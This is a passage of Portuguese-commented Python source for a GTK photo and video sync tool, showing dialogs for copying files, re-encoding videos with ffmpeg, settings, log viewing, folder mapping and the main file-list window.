grid.set_row_homogeneous(True)
grid.set_column_spacing(4)
grid.set_row_spacing(6)
for arquivo in self.lista_arquivos:
self.total = self.total + os.stat(arquivo).st_size
# Label com o título da atividade
grid.attach(Gtk.Label(label="Efetuando a re-codificação de " + str(len(arquivos)) +
" arquivos (" + to_human_size(self.total) + ")", halign=Gtk.Align.START), 0, 0, 6, 1)
# Progresso total
self.progress_bar_total = Gtk.ProgressBar(show_text=True)
grid.attach(self.progress_bar_total, 0, 1, 6, 1)
# Titulo de info do progresso global
self.label_progress_total = Gtk.Label(halign=Gtk.Align.START)
grid.attach(self.label_progress_total, 0, 2, 6, 1)
# Progresso da conversão do arquivo
self.progressbar_atual = Gtk.ProgressBar(show_text=True)
grid.attach(self.progressbar_atual, 0, 3, 6, 1)
# Titulo do arquivo
self.label_atual = Gtk.Label(halign=Gtk.Align.START)
grid.attach(self.label_atual, 0, 4, 6, 1)
self.get_content_area().pack_start(grid, True, True, 0)
self.show_all()
# Inicia a threa de conversão de vídeos
thread = Thread(target=self.processa_videos)
thread.daemon = True
thread.start()
def update_progess(self, titulo_barra_total, progresso_total, titulo_label_total, titulo_label_atual):
"""
Atualiza os contadores do arquivo atual e progresso total
"""
self.progress_bar_total.set_text(titulo_barra_total)
self.progress_bar_total.set_fraction(progresso_total) # O processo deve ser entre 0.0 e 1.0
self.label_progress_total.set_text(titulo_label_total)
self.label_atual.set_text(titulo_label_atual)
return False
def update_progess_arquivo(self, progresso_conversao):
"""
Atualiza o progress bar da conversão do arquivo
"""
self.progressbar_atual.set_fraction(progresso_conversao) # O processo deve ser entre 0.0 e 1.0
return False
def processa_videos(self):
"""
Efetua a conversão dos videos
"""
DURATION = "Duration:"
FRAME = "frame="
TIME = "time="
# Recupera o codec e o path do ffmpeg
codec_idx = get_app_settings("codec_video")
codec_idx = codec_idx if codec_idx is not None else "0"
codec_info = get_codec_info(CODECS_VIDEO[int(codec_idx)])
for arquivo in self.lista_arquivos:
try:
if not os.path.isfile(arquivo):
debug("Ignorando aquivo inexistente: " + arquivo)
self.failed = True
continue
self.completed_size = self.completed_size + os.stat(arquivo).st_size
novo_arquivo = self.dir_destino + os.sep + get_destino_arquivo(arquivo)
arquivo_copia = self.dir_destino + os.sep + os.path.basename(arquivo)
# Monta os parâmetros para a criação do novo video, de acordo com o codec escolhido
args = [get_caminho_ffmpeg(), "-hide_banner", "-i", arquivo_copia]
args.extend(codec_info["params"])
novo_arquivo = novo_arquivo[:novo_arquivo.rindex('.')] + codec_info["sufixo"]
args.append(novo_arquivo)
# Estatísticas da conversão total
titulo_barra_total = "[" + to_human_size(self.completed_size) + "/" + to_human_size(self.total) + "]"
titulo_label_total = "Original: " + os.path.basename(arquivo) + " (" + to_human_size(os.stat(arquivo).st_size) + ")"
if os.path.isfile(novo_arquivo):
titulo_label_atual = "Compactado: " + os.path.basename(novo_arquivo)
else:
titulo_label_atual = "Compactado: <Falha ao ler os dados do arquivo>"
progresso_total = self.completed_size / self.total # Percentual do progresso
# Atualiza as estatíticas do total e o nome do arquivo de destino
GLib.idle_add(self.update_progess, titulo_barra_total, progresso_total, titulo_label_total, titulo_label_atual)
# Cria o diretório, se não existir
directory = os.path.dirname(novo_arquivo)
if not os.path.exists(directory):
debug("Criando o diretório " + directory)
os.makedirs(directory)
# Verifica se o vídeo de destino existe
if os.path.isfile(novo_arquivo):
debug("Removendo arquivo de destino existente: " + novo_arquivo)
os.remove(novo_arquivo)
max_secs = 0
cur_secs = 0
# Checa se o usuário interrrompeu a conversão
if self.must_stop:
return None
# Efetua a conversão do arquivo de video
debug("Executando aplicação: " + str(args))
global g_processo_ffmpeg
g_processo_ffmpeg = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True)
# Inicia o processo e itera entre as linhas recebidas no stdout
for line in iter(g_processo_ffmpeg.stdout.readline, ''):
if DURATION in line:
# Essa linha contém o tamanho total do vídeo
try:
tmp = line[line.find(DURATION):]
tmp = tmp[tmp.find(" ") + 1:]
tmp = tmp[0: tmp.find(".")]
x = time.strptime(tmp, '%H:%M:%S')
max_secs = datetime.timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec).total_seconds()
except ValueError:
debug("Falha ao converter o horário: " + tmp)
elif line.startswith(FRAME) and TIME in line:
try:
# Captura o tempo da conversão (timestamp)
tmp = line[line.find(TIME):]
tmp = tmp[tmp.find("=") + 1: tmp.find(".")]
x = time.strptime(tmp, '%H:%M:%S')
cur_secs = datetime.timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec).total_seconds()
except ValueError:
debug("Falha ao converter o horário: " + tmp)
# Atualiza o progresso da conversão do arquivo de destino
if cur_secs > 0 and max_secs > 0:
GLib.idle_add(self.update_progess_arquivo, cur_secs / max_secs)
# Finaliza o processo do ffmpeg
g_processo_ffmpeg.stdout.close()
g_processo_ffmpeg.wait()
if os.path.isfile(arquivo):
debug("Vídeo original: " + arquivo + " (" + to_human_size(os.stat(arquivo).st_size) + ")")
if os.path.isfile(novo_arquivo):
debug("Vídeo convertido: " + novo_arquivo + " (" + to_human_size(os.stat(novo_arquivo).st_size) + ")")
# Remove a cópia do video original
if 'True' == get_app_settings("remover_video_apos_conversao"):
video_original = os.path.dirname(novo_arquivo) + os.sep + os.path.basename(arquivo)
if os.path.isfile(video_original):
debug("Removendo a cópia do video original: " + video_original)
os.remove(video_original)
except Exception as e:
debug("Falha ao converter o arquivo de vídeo " + arquivo + " : ", str(e))
self.failed = True
self.close()
class FileCopyProgressDialog(Gtk.Dialog):
"""
Dialog utilizada para exibir o progresso da cópia de arquivos
"""
must_stop = False
failed = False
total = 0
completed_size = 0
def __init__(self, parent, arquivos, destino):
Gtk.Dialog.__init__(self, "Copiando arquivos ", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL))
self.set_size_request(250, 150)
self.set_border_width(10)
self.lista_arquivos = arquivos
self.dir_destino = destino
# Container principal
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(4)
grid.set_row_spacing(6)
for arquivo in self.lista_arquivos:
self.total = self.total + os.stat(arquivo).st_size
# Label com o título da atividade
grid.attach(Gtk.Label(label="Efetuando a cópia de " + str(len(arquivos)) +
" arquivos (" + to_human_size(self.total) + ")", halign=Gtk.Align.START), 0, 0, 6, 1)
# Barra de progresso global
self.progress_bar = Gtk.ProgressBar(show_text=True)
grid.attach(self.progress_bar, 0, 1, 6, 1)
# Label do progresso do arquivo
self.label_progress = Gtk.Label(halign=Gtk.Align.START)
grid.attach(self.label_progress, 0, 2, 6, 1)
self.get_content_area().pack_start(grid, True, True, 0)
self.show_all()
thread = Thread(target=self.copia_arquivos)
thread.daemon = True
thread.start()
def update_progess(self, titulo_progresso, progresso_copia, titulo_copia):
"""
Atualiza o progress bar da cópia dos arquivos
"""
self.progress_bar.set_fraction(progresso_copia) # O processo deve ser entre 0.0 e 1.0
self.progress_bar.set_text(titulo_progresso)
self.label_progress.set_text(titulo_copia)
return False
def copia_arquivos(self):
"""
Efetua a cópia dos arquivos
"""
total_arquivos = len(self.lista_arquivos)
for i, arquivo in enumerate(self.lista_arquivos):
try:
self.completed_size = self.completed_size + os.stat(arquivo).st_size
titulo_progresso = "[" + to_human_size(self.completed_size) + "/" + to_human_size(self.total) + "]"
progresso_copia = self.completed_size / self.total # Percentual do progresso
titulo_copia = "[" + str(i) + "/" + str(total_arquivos) + "] " + os.path.basename(arquivo) + " (" + to_human_size(os.stat(arquivo).st_size) + ")"
GLib.idle_add(self.update_progess, titulo_progresso, progresso_copia, titulo_copia)
# Verifica se a cópia foi interrompida
if self.must_stop:
return None
# Cria o diretório, se não existir
novo_arquivo = self.dir_destino + os.sep + get_destino_arquivo(arquivo)
dir_novo_arquivo = os.path.dirname(novo_arquivo)
if not os.path.exists(dir_novo_arquivo):
try:
debug("Criando o diretório " + dir_novo_arquivo)
os.makedirs(dir_novo_arquivo)
except Exception as e:
debug("Falha ao criar o diretório de destino [" + dir_novo_arquivo + "]: " + str(e))
continue
# Sempre copia o arquivo
debug("Copiando " + arquivo + " -> " + novo_arquivo)
shutil.copy2(arquivo, novo_arquivo)
# Se selecionado a opção, remover após a cópia
if 'True' == get_app_settings("remover_apos_copia"):
try:
debug("Removendo arquivo de origem " + arquivo)
os.remove(arquivo)
except Exception as e:
debug("Falha ao remover o arquivo de origem após a cópia [" + arquivo + "]: " + str(e))
except Exception as e:
debug("Falha durante a cópia do arquivo [" + arquivo + "]: " + str(e))
continue
self.close()
class InputDialog(Gtk.Dialog):
"""
Dialog de solicitação de dados em um campo de texto ou combo
"""
text_field = None
combo_box = None
def __init__(self, parent, message, default, opcoes):
Gtk.Dialog.__init__(self, "Solicitação de informação do usuário", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(350, 150)
self.set_border_width(10)
topbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)
topbox.pack_start(Gtk.Label(label=message, halign=Gtk.Align.START), True, True, 0)
debug("Solicitação de informação ao usuário: " + message)
if opcoes is None:
# Campo de texto
self.text_field = Gtk.Entry()
self.text_field.set_text(default)
topbox.pack_start(self.text_field, True, True, 0)
else:
self.combo_box = Gtk.ComboBoxText()
# Campo de texto
for i, word in enumerate(opcoes.split('|')):
self.combo_box.append_text(word)
if default and unicode(word) == unicode(default):
self.combo_box.set_active(i)
topbox.pack_start(self.combo_box, True, True, 0)
self.get_content_area().pack_start(topbox, False, False, 0)
self.show_all()
def do_valida_campos(self):
if self.text_field is not None and not self.text_field.get_text().strip():
return show_message('Campo obrigatório não informado:', 'É necessário especificar o valor do campo.')
if self.combo_box is not None and not self.combo_box.get_active_text():
return show_message('Campo obrigatório não informado:', 'É necessário selecionar um item.')
return Gtk.ResponseType.OK
def show_and_get_info(self):
while self.run() == Gtk.ResponseType.OK:
if self.do_valida_campos() is not None:
if self.text_field is not None:
resp = self.text_field.get_text().strip()
else:
resp = self.combo_box.get_active_text()
self.destroy()
return resp
self.destroy()
return None
class ConfigDialog(Gtk.Dialog):
"""
Dialog de configuração da aplicação
"""
def __init__(self, parent):
Gtk.Dialog.__init__(self, "Configurações da aplicação", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(400, 300)
self.set_border_width(10)
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(2)
grid.set_row_spacing(2)
grid_check = Gtk.Grid()
# Apenas fotos e videos
self.check_fotos_videos = Gtk.CheckButton("Copiar apenas as fotos e os vídeos")
self.check_fotos_videos.set_active('True' == get_app_settings("apenas_fotos_e_videos"))
grid_check.attach(self.check_fotos_videos, 0, 0, 3, 1)
# Sobrescrever
self.check_sobrescrever = Gtk.CheckButton("Sobrescrever os arquivos de destino")
self.check_sobrescrever.set_active('True' == get_app_settings("sobrescrever_arquivos"))
grid_check.attach(self.check_sobrescrever, 4, 0, 3, 1)
# Remover após copia
self.check_remover_copia = Gtk.CheckButton("Remover os arquivos originais após a cópia")
self.check_remover_copia.set_active('True' == get_app_settings("remover_apos_copia"))
grid_check.attach(self.check_remover_copia, 0, 1, 3, 1)
# Exibir resolução dos arquivos
self.check_exibir_resolucao = Gtk.CheckButton("Exibir a resolução dos arquivos")
self.check_exibir_resolucao.set_active('True' == get_app_settings("exibir_resolucao_arquivos"))
grid_check.attach(self.check_exibir_resolucao, 4, 1, 3, 1)
# Comprimir videos
self.check_recode = Gtk.CheckButton("Re-codificar arquivos de vídeo")
self.check_recode.set_active('True' == get_app_settings("recodificar_videos"))
grid_check.attach(self.check_recode, 0, 2, 3, 1)
# Formato do video
flowbox = Gtk.FlowBox()
flowbox.add(Gtk.Label(label="Formato do vídeo:", halign=Gtk.Align.START))
self.combo_codecs = Gtk.ComboBoxText()
for codec in CODECS_VIDEO:
self.combo_codecs.append_text(codec)
self.combo_codecs.set_active(0)
self.combo_codecs.set_entry_text_column(1)
codec_idx = get_app_settings("codec_video")
if codec_idx is not None:
self.combo_codecs.set_active(int(codec_idx))
flowbox.add(self.combo_codecs)
grid_check.attach(flowbox, 4, 2, 3, 1)
# Remover Videos convertidos
self.check_remover_video = Gtk.CheckButton("Remover a cópia do video original após a conversão")
self.check_remover_video.set_active('True' == get_app_settings("remover_video_apos_conversao"))
grid_check.attach(self.check_remover_video, 0, 3, 3, 1)
grid.attach(grid_check, 0, 0, 6, 3)
# Campo Destino
self.edit_caminho_ffmpeg = Gtk.Entry()
self.edit_caminho_ffmpeg.set_text(get_app_settings("caminho_ffmpeg"))
button = Gtk.Button.new_from_icon_name("document-open", Gtk.IconSize.BUTTON)
button.connect("clicked", self.do_click_seleciona_ffmpeg)
box_destino = Gtk.Box()
box_destino.pack_start(Gtk.Label(label="Caminho do ffmpeg:", halign=Gtk.Align.START), False, False, 0)
box_destino.pack_start(self.edit_caminho_ffmpeg, True, True, 4)
box_destino.pack_end(button, False, False, 0)
grid.attach(box_destino, 0, 3, 6, 1)
# Lista de videos
self.taskstore_videos = Gtk.ListStore(str)
self.treeview_videos = Gtk.TreeView(model=self.taskstore_videos)
self.treeview_videos.append_column(Gtk.TreeViewColumn("Extensão dos arquivos de Video", Gtk.CellRendererText(), text=0))
scrollable_treelist_videos = Gtk.ScrolledWindow()
scrollable_treelist_videos.set_vexpand(True)
scrollable_treelist_videos.set_hexpand(True)
scrollable_treelist_videos.add(self.treeview_videos)
grid_video = Gtk.Grid()
grid_video.attach(scrollable_treelist_videos, 0, 0, 6, 6)
for video in get_app_settings("extensoes_video").split('|'):
self.taskstore_videos.append([video])
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-add", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_add_video)
flowbox.add(button)
grid_video.attach(flowbox, 7, 3, 1, 1)
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-remove", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_del_video)
flowbox.add(button)
grid_video.attach(flowbox, 7, 4, 1, 1)
grid.attach(grid_video, 0, 4, 3, 6)
# Lista de Fotos
self.taskstore_fotos = Gtk.ListStore(str)
self.treeview_fotos = Gtk.TreeView(model=self.taskstore_fotos)
self.treeview_fotos.append_column(Gtk.TreeViewColumn("Extensão dos arquivos de Foto", Gtk.CellRendererText(), text=0))
scrollable_treelist_fotos = Gtk.ScrolledWindow()
scrollable_treelist_fotos.set_vexpand(True)
scrollable_treelist_fotos.set_hexpand(True)
scrollable_treelist_fotos.add(self.treeview_fotos)
grid_foto = Gtk.Grid()
grid_foto.attach(scrollable_treelist_fotos, 0, 0, 6, 6)
for foto in get_app_settings("extensoes_foto").split('|'):
self.taskstore_fotos.append([foto])
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-add", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_add_foto)
flowbox.add(button)
grid_foto.attach(flowbox, 7, 3, 1, 1)
flowbox = Gtk.FlowBox()
button = Gtk.Button.new_from_icon_name("list-remove", Gtk.IconSize.MENU)
button.connect("clicked", self.do_click_del_foto)
flowbox.add(button)
grid_foto.attach(flowbox, 7, 4, 1, 1)
grid.attach(grid_foto, 4, 4, 3, 6)
self.get_content_area().pack_start(grid, False, False, 0)
self.show_all()
def do_click_seleciona_ffmpeg(self, widget): # @UnusedVariable
debug("Selecionando o caminho do FFMPEG")
dialog = Gtk.FileChooserDialog("Selecione o caminho do ffmpeg ", self, Gtk.FileChooserAction.OPEN,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
caminho = self.edit_caminho_ffmpeg.get_text().strip()
if os.path.isfile(caminho):
dialog.set_current_folder(caminho)
response = dialog.run()
if response == Gtk.ResponseType.OK:
self.edit_caminho_ffmpeg.set_text(dialog.get_filename())
debug("Caminho do ffmpeg selecionado: " + dialog.get_filename())
dialog.destroy()
def do_click_del_video(self, widget): # @UnusedVariable
self.remove_item("video")
def do_click_add_video(self, widget): # @UnusedVariable
self.add_item("video")
def do_click_del_foto(self, widget): # @UnusedVariable
self.remove_item("foto")
def do_click_add_foto(self, widget): # @UnusedVariable
self.add_item("foto")
def add_item(self, titulo):
info = InputDialog(main_window, 'Informe a extensão do arquivo de ' + titulo, '', None).show_and_get_info()
if info is not None:
store = self.taskstore_videos if titulo == "video" else self.taskstore_fotos
store.append([info])
def remove_item(self, titulo):
debug("Removendo item da lista de " + titulo)
tree = self.treeview_fotos
store = self.taskstore_fotos
if titulo == "video":
store = self.taskstore_videos
tree = self.treeview_videos
select = tree.get_selection()
treeiter = select.get_selected()
if treeiter[1] is None:
return show_message("Não é possível excluir", "É necessário selecionar um dos ítens para continuar.")
store.remove(treeiter)
def show_and_get_info(self):
while self.run() == Gtk.ResponseType.OK:
set_app_settings("remover_apos_copia", str(self.check_remover_copia.get_active()))
set_app_settings("sobrescrever_arquivos", str(self.check_sobrescrever.get_active()))
set_app_settings("recodificar_videos", str(self.check_recode.get_active()))
set_app_settings("caminho_ffmpeg", self.edit_caminho_ffmpeg.get_text().strip())
set_app_settings("codec_video", str(self.combo_codecs.get_active()))
set_app_settings("apenas_fotos_e_videos", str(self.check_fotos_videos.get_active()))
set_app_settings("exibir_resolucao_arquivos", str(self.check_exibir_resolucao.get_active()))
videos = ""
for row in self.taskstore_videos:
videos = videos + "|" + row[0]
videos = videos[1:]
set_app_settings("extensoes_video", videos)
fotos = ""
for row in self.taskstore_fotos:
fotos = fotos + "|" + row[0]
fotos = fotos[1:]
set_app_settings("extensoes_foto", fotos)
self.destroy()
return None
class LogViewerDialog(Gtk.Dialog):
"""
Dialogo para exibição do log
"""
def __init__(self, parent):
Gtk.Dialog.__init__(self, "Log da aplicação", parent, 0, (Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(1024, 600)
self.set_border_width(10)
scrolledwindow = Gtk.ScrolledWindow()
scrolledwindow.set_hexpand(True)
scrolledwindow.set_vexpand(True)
self.grid = Gtk.Grid()
self.grid.attach(scrolledwindow, 0, 1, 3, 1)
self.textview = Gtk.TextView()
scrolledwindow.add(self.textview)
# Carrega o arquivo de log
self.textview.get_buffer().set_text(open(ARQUIVO_LOG).read())
self.get_content_area().pack_start(self.grid, True, True, 0)
self.show_all()
def show_and_get_info(self):
self.run()
self.destroy()
return None
class MapeamentoDialog(Gtk.Dialog):
"""
Dialogo para mapeamento dos diretórios de destino
"""
def __init__(self, parent):
Gtk.Dialog.__init__(self, "Mapeamento dos diretórios de destino", parent, 0, (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(500, 400)
self.set_border_width(10)
scrolledwindow = Gtk.ScrolledWindow()
scrolledwindow.set_hexpand(True)
scrolledwindow.set_vexpand(True)
self.grid = Gtk.Grid()
self.grid.attach(scrolledwindow, 0, 1, 3, 1)
self.textview = Gtk.TextView()
scrolledwindow.add(self.textview)
# Carrega o mapeamento atual
global g_dic_mapeamento_dir_destino
lines = ""
for key in sorted(g_dic_mapeamento_dir_destino.iterkeys()):
if key in g_dic_mapeamento_dir_origem:
lines = lines + key + " => " + g_dic_mapeamento_dir_destino[key] + " #" + g_dic_mapeamento_dir_origem[key] + "\n"
else:
lines = lines + key + " => " + g_dic_mapeamento_dir_destino[key] + "\n"
self.textview.get_buffer().set_text(lines)
self.get_content_area().pack_start(self.grid, True, True, 0)
self.show_all()
def show_and_update_file_list(self):
global g_dic_mapeamento_dir_destino
while self.run() == Gtk.ResponseType.OK:
buf = self.textview.get_buffer()
resp = buf.get_text(buf.get_start_iter(), buf.get_end_iter(), True)
for line in resp.splitlines():
key = line[:line.find("=>")].strip()
value = line[line.find("=>") + 2:line.find("#")].strip() if '#' in line else line[line.find("=>") + 2:].strip()
g_dic_mapeamento_dir_destino[key] = value
self.destroy()
return True
self.destroy()
return False
class MainWindow(Gtk.Window):
"""
Janela principal da aplicação
"""
COLUNAS_GRID = ["Copiar", "Status", "Arquivo", "Destino", "Tipo", "Tamanho", "Detalhes"]
popupMenuTree = Gtk.Menu()
def __init__(self):
Gtk.Window.__init__(self, title="Photo Sync - " + VERSAO_APPLICACAO)
self.set_icon_name("application-x-executable")
Gtk.Settings().set_property('gtk_button_images', True)
# Clipboard para cópia do texto
self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)
self.set_resizable(True)
self.set_border_width(10)
self.set_default_size(640, 480)
self.set_size_request(640, 480)
# Container principal
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(4)
grid.set_row_spacing(6)
# Campo Origem
grid.attach(Gtk.Label(label="Diretório de Origem:", halign=Gtk.Align.START), 0, 0, 1, 1)
self.edit_origem = Gtk.Entry()
self.edit_origem.set_activates_default(True)
self.edit_origem.set_text(get_app_settings("dir_origem"))
grid.attach(self.edit_origem, 1, 0, 6, 1)
button = Gtk.Button.new_from_icon_name("folder-open", Gtk.IconSize.BUTTON)
button.connect("clicked", self.do_click_origem)
flowbox = Gtk.FlowBox()
flowbox.add(button)
grid.attach(flowbox, 7, 0, 1, 1)
self.labelStatusFrom = Gtk.Label(label="", halign=Gtk.Align.START)
grid.attach(self.labelStatusFrom, 0, 1, 8, 1)
# Campo Destino
grid.attach(Gtk.Label(label="Diretório de Destino:", halign=Gtk.Align.START), 0, 2, 1, 1)
self.edit_destino = Gtk.Entry()
self.edit_destino.set_text(get_app_settings("dir_destino"))
grid.attach(self.edit_destino, 1, 2, 6, 1)
button = Gtk.Button.new_from_icon_name("folder-open", Gtk.IconSize.BUTTON)
button.connect("clicked", self.do_click_destino)
flowbox = Gtk.FlowBox()
flowbox.add(button)
grid.attach(flowbox, 7, 2, 1, 1)
self.labelStatusTo = Gtk.Label(label="", halign=Gtk.Align.START)
grid.attach(self.labelStatusTo, 0, 3, 8, 1)
# Barra de botões
# Ler aquivos
self.button_ler_arquivos = create_icon_and_label_button("Atualizar", "view-refresh")
self.button_ler_arquivos.connect("clicked", self.do_click_check_files)
grid.attach(self.button_ler_arquivos, 0, 4, 1, 1)
# Sincronizar
self.button_sync_arquivos = create_icon_and_label_button("Sincronizar", "system-run")
self.button_sync_arquivos.set_sensitive(False)
self.button_sync_arquivos.connect("clicked", self.do_click_sync_files)
grid.attach(self.button_sync_arquivos, 1, 4, 1, 1)
# Mapeamento
self.button_mapeamento = create_icon_and_label_button("Mapeamento", "document-properties")
self.button_mapeamento.set_sensitive(False)
self.button_mapeamento.connect("clicked", self.do_click_mapeamento_dir)
grid.attach(self.button_mapeamento, 2, 4, 1, 1)
# Configurações
self.button_config = create_icon_and_label_button("Configurações", "applications-system")
self.button_config.connect("clicked", self.do_click_config)
grid.attach(self.button_config, 3, 4, 1, 1)
# Logs
button = create_icon_and_label_button("Logs", "system-search")
button.connect("clicked", self.do_click_logs)
grid.attach(button, 4, 4, 1, 1)
# Sair
button = create_icon_and_label_button("Fechar", "window-close")
button.connect("clicked", self.do_click_close)
grid.attach(button, 7, 4, 1, 1)
# grid de arquivos
# Cria o grid
self.store = Gtk.ListStore(bool, str, str, str, str, str, str)
self.filtro = self.store.filter_new()
# self.filtro.set_visible_func(self.do_filter_grid)
cellRenderer = Gtk.CellRendererText()
# Adiciona as COLUNAS_GRID ao TreeView
self.treeview = Gtk.TreeView(model=self.store)
self.treeview.connect("button_press_event", self.do_show_popup)
# Colunas 0 e 1 não são texto
col1 = Gtk.TreeViewColumn("Copiar", Gtk.CellRendererToggle(), active=0)
col1.set_sort_column_id(0)
self.treeview.append_column(col1)
col2 = Gtk.TreeViewColumn("Status", Gtk.CellRendererPixbuf(), icon_name=1)
col2.set_sort_column_id(1)
self.treeview.append_column(col2)
# Adiciona as demais COLUNAS_GRID
for i, column_title in enumerate(self.COLUNAS_GRID):
column = Gtk.TreeViewColumn(column_title, cellRenderer, text=i)
if i > 1: # Colunas 0 e 1 são do checkbox e icon e foram adicionadas anteriormente
self.treeview.append_column(column)
self.store.set_sort_func(i, compareTreeItem, None)
column.set_sort_column_id(i)
self.treeview.connect("row-activated", self.on_tree_double_clicked)
# Adiciona o treeview a um scrollwindow
scrollable_treelist = Gtk.ScrolledWindow()
scrollable_treelist.set_vexpand(True)
scrollable_treelist.add(self.treeview)
grid.attach(scrollable_treelist, 0, 5, 8, 8)
# Label de seleção dos arquivos
self.label_status_copia = Gtk.Label(label="", halign=Gtk.Align.START)
grid.attach(self.label_status_copia, 0, 13, 8, 1)
self.add(grid)
i0 = Gtk.MenuItem("Desmarcar todos os arquivos")
i0.connect("activate", self.do_desmarcar_todos)
self.popupMenuTree.append(i0)
i1 = Gtk.MenuItem("Marcar todos os videos")
i1.connect("activate", self.do_marca_todos_videos)
self.popupMenuTree.append(i1)
i2 = Gtk.MenuItem("Marcar todas as fotos")
i2.connect("activate", self.do_marca_todas_fotos)
self.popupMenuTree.append(i2)
i3 = Gtk.MenuItem("Marcar videos não H265")
i3.connect("activate", self.do_marcar_nao_h265)
self.popupMenuTree.append(i3)
i4 = Gtk.MenuItem("Apagar arquivos marcados")
i4.connect("activate", self.do_apagar_selecionados)
self.popupMenuTree.append(i4)
self.popupMenuTree.show_all()
def do_show_popup(self, tv, event): # @UnusedVariable
if event.button == 3:
self.popupMenuTree.popup(None, None, None, None, 0, Gtk.get_current_event_time())
def do_apagar_selecionados(self, widget): # @UnusedVariable
debug("MenuItem: Apagar arquivos marcados")
arquivos = self.do_monta_lista_arquivos_copiar()
if len(arquivos) > 0:
dialog = Gtk.MessageDialog(self, 0, Gtk.MessageType.QUESTION, Gtk.ButtonsType.YES_NO, "Confirmação da exclusão")
dialog.format_secondary_text("Você realmente deseja remover os " + str(len(arquivos)) + " arquivos marcados?")
response = dialog.run()
if response == Gtk.ResponseType.YES:
for arquivo in arquivos:
debug("Removendo arquivo " + arquivo)
os.remove(arquivo)
self.do_monta_lista_arquivos()
dialog.destroy()
def do_marcar_nao_h265(self, widget): # @UnusedVariable
debug("MenuItem: Marcar videos não H265")
for row in self.store:
if self.is_video(row[2]) and 'hevc' not in row[6]:
row[0] = True
self.do_atualiza_contador_selecao()
def do_marca_todas_fotos(self, widget): # @UnusedVariable
debug("MenuItem: Marcar todas as fotos")
for row in self.store:
if self.is_foto(row[2]):
row[0] = True
def do_marca_todos_videos(self, widget): # @UnusedVariable
debug("MenuItem: Marcar todos os videos")
for row in self.store:
if self.is_video(row[2]):
row[0] = True
self.do_atualiza_contador_selecao()
def do_desmarcar_todos(self, widget): # @UnusedVariable
debug("MenuItem: Desmarcar todos os arquivos")
for row in self.store:
row[0] = False
self.do_atualiza_contador_selecao()
def do_click_origem(self, widget): # @UnusedVariable
self.do_seleciona_dir("origem")
def do_click_destino(self, widget): # @UnusedVariable
self.do_seleciona_dir("destino")
def do_seleciona_dir(self, titulo):
debug("Selecionando diretório de " + titulo)
editor = self.edit_origem if titulo == "origem" else self.edit_destino
dialog = Gtk.FileChooserDialog("Selecione o diretório de " + titulo, self, Gtk.FileChooserAction.SELECT_FOLDER,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
current_dir = editor.get_text().strip()
if os.path.isdir(current_dir):
dialog.set_current_folder(current_dir)
response = dialog.run()
if response == Gtk.ResponseType.OK:
editor.set_text(dialog.get_filename())
debug("Diretório de " + titulo + " selecionado: " + dialog.get_filename())
set_app_settings("dir_" + titulo, dialog.get_filename())
dialog.destroy()
def get_tipo_arquivo(self, arquivo):
tipo = "Desconhecido"
if self.is_foto(arquivo):
tipo = "Foto"
elif self.is_video(arquivo):
tipo = "Video"
return tipo
def get_file_is_sync(self, arquivo):
global g_lista_arquivos_destino
arquivos = g_lista_arquivos_destino.get(os.path.basename(arquivo), [])
tamanho_origem = os.stat(arquivo).st_size
found = False
if len(arquivos) > 0:
for dests in arquivos:
found = found or tamanho_origem == os.stat(dests).st_size
return found
def get_icone_arquivo(self, sync):
mover = 'True' == get_app_settings("remover_apos_copia")
resp = "forward" if mover else "go-down"
if sync:
sobrescreve = 'True' == get_app_settings("sobrescrever_arquivos")
resp = "gtk-stop" if sobrescreve else "ok"
return resp
def do_monta_lista_arquivos(self):
active = g_leitura_origem_finalizada and g_leitura_destino_finalizada
if active:
debug("Populando a grid de arquivos")
global g_lista_arquivos_origem
global g_dic_info_arquivos_origem
# Verifica se deve sobrescrever os arqivos existentes
sobrescrever = 'True' == get_app_settings("sobrescrever_arquivos")
self.store.clear()
src = self.edit_origem.get_text().strip()
pos_src = len(src) if src.endswith(os.sep) else len(src) + 1
for arquivo in g_lista_arquivos_origem:
sync = self.get_file_is_sync(arquivo)
icon = self.get_icone_arquivo(sync)
tamanho = to_human_size(os.stat(arquivo).st_size)
detalhes = g_dic_info_arquivos_origem[arquivo]
arquivo_abr = arquivo[pos_src:]
tipo_arquivo = self.get_tipo_arquivo(arquivo)
destino = get_destino_arquivo(arquivo)
# Se for para sobrescrever, sync deve ser sempre falso
if sobrescrever:
sync = False
self.store.append([
not sync,
icon,
arquivo_abr,
destino,
tipo_arquivo,
tamanho,
detalhes
])
# Habilita os botões
self.button_ler_arquivos.set_sensitive(active)
self.button_sync_arquivos.set_sensitive(active)
self.button_mapeamento.set_sensitive(active)
# Atualiza o contador
self.do_atualiza_contador_selecao()
debug("Grid de arquivos populada")
def do_read_file_list_origem(self):
global g_lista_arquivos_origem
global g_leitura_origem_finalizada
